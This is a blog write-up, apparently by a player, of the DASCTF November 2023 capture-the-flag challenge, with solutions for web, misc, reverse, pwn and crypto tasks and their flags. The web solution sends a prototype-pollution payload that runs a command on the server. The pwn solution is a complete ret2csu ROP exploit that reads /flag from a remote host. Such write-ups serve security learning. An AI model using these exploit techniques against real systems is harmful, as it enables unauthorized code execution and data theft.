DASCTF十一月挑战赛

Web

realrce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests

url = 'http://4d2b8a71-91db-4dbf-b95a-6be4d3505e29.node4.buuoj.cn:81/'

payload = {
"msg": {
"__proto__": {
"cmd_rce": "env",
"tingshuitingdiandaxue": "%dd"
}
}
}

try:
response = requests.post(url, json=payload)

print(response.text)
except requests.exceptions.RequestException as e:
print(e)

Misc

IceTea

1
2
3
4
5
/www/wwwroot/DAS202310.com/

cd "/www/wwwroot/DAS202310.com";

./ezbase e flag.txt IceTea.txt;

可以看到对flag.txt执行了base加密操作,追踪TCP流,在流0处,找到一个ELF文件

dump下来查壳发现有upx壳,脱壳后得到Base64的表(这应该是出题人设想的预期解)但实际上我猜测elf文件损坏,导致无法直接使用UPX脱壳工具自动脱壳。在HTTP流4,找到密文(🐜🗡流量要去掉前两位)

IDA打开dump下来的elf文件,查看strings,发现有疑似base表的信息,跟进去看一下

Shift+e看一下

解一下Hex,就可以看到表了,手动去一下干扰字符

https://cyberchef.cn/#recipe=From_Base64('abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ%2B/',true,false)&input=cmVmdHFScmc0UUI5enZaUXp3ZjUweG41MUNaUXhTZjUxZ1pQenhqNXpoakYxQ0k3NXFFPQ

Reverse

ezpython

010打开pyc文件发现key:yuanshen

1
2
3
4
import importlib

print(importlib.util.MAGIC_NUMBER.hex())
#a70d0d0a

得到Python3.11的Magic Number,用010修复pyc

使用工具反编译

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
import pyDes

def adjust_length(str):
if len(str) < 8:
str = str.ljust(8, '0')
elif len(str) > 8:
str = str[:8]
return str


def yuanshen(array, start, end):
Unsupported opcode: JUMP_BACKWARD
num = len(array)
dis = [
float('inf')] * num
tree = [
False] * num
parent = [
-1] * num
dis[start] = 0
# WARNING: Decompyle incomplete


def qidong(input, key, IV):
cipher = pyDes.des(key, pyDes.CBC, IV, pad = None, padmode = pyDes.PAD_PKCS5)
encrypted_data = cipher.encrypt(input)
encrypted_hex_list = encrypted_data()
return encrypted_hex_list


def main():
data = [
159,
41,
201,
125,
67,
60,
44,
34,
203,
56,
116,
186,
13,
71,
125,
30,
84,
123,
109,
54,
106,
56,
17,
124,
87,
236,
25,
12,
80,
178,
165,
123]
key = input('璇疯緭鍏ey: ')
if len(key) != 8:
print('wrong key lenth!')
exit()
flag = input('璇疯緭鍏lag: ')
array = [
[
0,
float('inf'),
float('inf'),
1,
3,
4,
float('inf'),
float('inf'),
float('inf')],
[
float('inf'),
0,
float('inf'),
float('inf'),
float('inf'),
2,
float('inf'),
4,
float('inf')],
[
float('inf'),
float('inf'),
0,
8,
1,
float('inf'),
float('inf'),
float('inf'),
1],
[
1,
float('inf'),
8,
0,
3,
5,
1,
2,
float('inf')],
[
3,
float('inf'),
1,
3,
0,
float('inf'),
1,
5,
3],
[
4,
2,
float('inf'),
5,
float('inf'),
0,
float('inf'),
1,
float('inf')],
[
float('inf'),
float('inf'),
float('inf'),
1,
1,
float('inf'),
0,
float('inf'),
5],
[
float('inf'),
4,
float('inf'),
2,
5,
1,
5,
0,
float('inf')],
[
float('inf'),
float('inf'),
1,
float('inf'),
3,
float('inf'),
float('inf'),
float('inf'),
0]]
t = yuanshen(array, 1, 8)
IV = (lambda .0: Unsupported opcode: RETURN_GENERATOR
pass# WARNING: Decompyle incomplete
)(t())
IV = adjust_length(IV)
check = qidong(flag, key, IV)
if check == data:
print('yes,yes,yes!!')
return None
''.join('bad,bad,bad!!')

main()

GPT分析了解到是最短路径算法,根据array数组得到iv=15736428,最后解DES

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

def decrypt_des_cbc(ciphertext, key, iv):
cipher = DES.new(key.encode(), DES.MODE_CBC, iv.encode())
decrypted_data = unpad(cipher.decrypt(bytes(ciphertext)), DES.block_size)
return decrypted_data.decode()

data = [
159,
41,
201,
125,
67,
60,
44,
34,
203,
56,
116,
186,
13,
71,
125,
30,
84,
123,
109,
54,
106,
56,
17,
124,
87,
236,
25,
12,
80,
178,
165,
123]

key = "yuanshen"
iv = "15736428"

flag = decrypt_des_cbc(data, key, iv)
print(flag)

#DASCTF{D0_U_4ls0_l1k3_7uansH3n}

Pwn

asadstory

ret2csu把close最后一位改成\x15,变成syscall然后用read控rax,openat替换open

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *

context.arch = 'amd64'
libc = ELF('./libc-2.31.so')
elf = ELF('./challenge')

# p = process("./challenge")
p = remote("node4.buuoj.cn", 28133)

def elf_base():
p.sendlineafter(b': ', b'1')
p.sendlineafter(b': ', b'1')
p.recvuntil(b'0x')
value = int(p.recv(12), 16) - 0x1249
return value

elf.address = elf_base()
print("elf-->" + hex(elf.address))

csu1 = elf.address + 0x1620
csu2 = elf.address + 0x163a

offset = b'a' * 0x38

# Craft the ROP chain
rop_chain = [
csu2, 0, 1, 0, elf.got['close'], 1, elf.got['read'],
csu1, 0, 0, 0, 0, 0, 0, 0,
csu2, 0, 1, 0, elf.address + 0x4280, 257, elf.got['read'],
csu1, 0, 0, 0, 0, 0, 0, 0,
csu2, 0, 1, 0, elf.address + 0x4280, 0, elf.got['close'],
csu1, 0, 0, 0, 0, 0, 0, 0,
csu2, 0, 1, 1, elf.address + 0x4280, 0x30, elf.got['read'],
csu1, 0, 0, 0, 0, 0, 0, 0,
csu2, 0, 1, 0, elf.address + 0x4280 + 0x30, 1, elf.got['read'],
csu1, 0, 0, 0, 0, 0, 0, 0,
csu2, 0, 1, 2, elf.address + 0x4280, 0x30, elf.got['close'],
csu1
]


payload = b''.join([p64(addr) for addr in rop_chain])


p.sendline(b'2')
p.sendline(offset + payload)
p.send(b'\x15')
p.send(b'/flag' + b'\x00' * (257 - 5))
p.send(b'\x00' * 1)
p.interactive()

Crypto

GeneratePrime

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from Crypto.Util.number import *

n=43090231453250894711427929679917165532091051269639380881822679198388872373018031295429558758883298138388596507242928145888959963579111847255588834248367032580980272245414738073179172684104908272069503607376171584936239696444309039211273376010193165083254209608051430794825261116490356392215410064858020176711199543381037420111454942356936721487016187240237683725310306748046587503625096246489043270381153251813360521583717685413070481576320194446237522118380283335294528606720928637529817170809666802598938788405154468683850385277659812316577873886708164549255359514776884765904417881419804464020855420288884972204146588152412816874161445668955639456202226751519881834234916642218078966066353317917939418964763844067220460513388433020071277477619189495465483910271310025371745344364984826481983188861624474015117761898377237745775289039922285111681410319016537270412509750339539020876501534842403407208957382830000761065368861209033791387480377889838737241326116532852335478193204425626487166234964754732945953080086117315162916374952094149599597509405176646068341218684523765974759907645226607364627690026025662221036766148813918691578120023886400197652148214238256715089883892069133754778609710846757189987335827693169644541734443763194942694587436469448973201513131503797898892822373949177030567791519349220158287318717788746060997955057747930375117780320371517616412423571775682868481089431670802944047375824503353609019686495670630728618082254293585479431369645935654024149490741245953271830453426444847467908952699660750809490650479987
e=65537
c=30862228874892553476569860337345503267926249096036551213683005116620750680365154103242717714230966827288361499342464202425467642950081816675486231250411347472976482409360391136808439034217688010072648722396312121758844966972323513456884732046270240934002095706243044210312663525491282667971502534420245427643076262414036655243117610886157895994101178663474990136516153062956803591842233732498519246731337518545018734984319536536205092573418457928952414660837594265802406473201400259189950484841504227372735345451459452313825309333631615286962304963039625162366186574440146535361888708570569938418676320446653266676364765870547213167058713058609788316647593834008151805692510044158607162858906528913516242904419457446211348504248317409844426309455978985314882123424453618672960876022996245213882467954521212481418830104602302179759479012618982228223244131619557639469872139485197176384683400796204681045965981417650462297978265085323342772310690638049411549216990505001950512428646871875659468885490055363436412364532718888124906227240501145227269727887236864060558999336443165765870556727793253297515155026234234422303238380776900105115890363548589834345888430695886678231459920101695996112312269637459823479947618045447071359886515163416153117176539752947700226596291435270282598638974889205601333097978743387412651687356072223691445472690647184292120882095587563356691450107194982597794937293154289560470269606300576216128045797481404606810315677962659136641943747123985144899464108823536597185386155005111274476874957827391438859327653936
k = 5

R = Zmod(n)["x"]
while True:
Q = R.quo(R.random_element(k))
pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
if pp != 1:
qq = sum([pp**i for i in range(k)])
rr = n // (pp * qq)
assert n == pp * qq * rr
break
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))

#DASCTF{just_a_very_very_easy_task_with_your_talent_is_not}

DASCTF十一月挑战赛
https://g1at.github.io/2023/11/25/DASCTF十一月挑战赛/
作者
g0at
发布于
2023年11月25日
许可协议